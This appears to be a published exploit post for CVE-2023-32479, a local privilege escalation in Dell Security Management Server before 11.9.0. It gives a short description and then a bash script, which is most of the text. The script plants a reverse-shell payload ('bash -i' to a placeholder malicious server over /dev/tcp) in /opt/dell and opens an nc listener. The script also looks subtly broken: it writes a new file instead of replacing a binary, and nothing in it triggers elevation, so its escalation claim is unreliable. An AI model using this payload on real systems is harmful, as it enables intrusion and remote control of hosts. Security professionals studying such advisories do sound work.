Dell Security Management Server versions prior to 11.9.0 suffer from a local privilege escalation vulnerability.
advisories | CVE-2023-32479
# Exploit Title: [title] Dell Security Management Server versions prior to
11.9.0
# Exploit Author: [author] Amirhossein Bahramizadeh
# CVE : [if applicable] CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
Management
Server versions prior to 11.9.0 contain privilege escalation vulnerability
due to improper ACL of the non-default installation directory. A local
malicious user could potentially exploit this vulnerability by replacing
binaries in installed directory and taking the reverse shell of the system
leading to Privilege Escalation.
#!/bin/bash
INSTALL_DIR="/opt/dell"
# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
# Replace a binary in the installed directory with a malicious binary that opens a reverse shell
echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
chmod +x "$INSTALL_DIR/dell-exploit"
# Wait for the reverse shell to connect to your malicious server
nc -lvnp 1234
fi
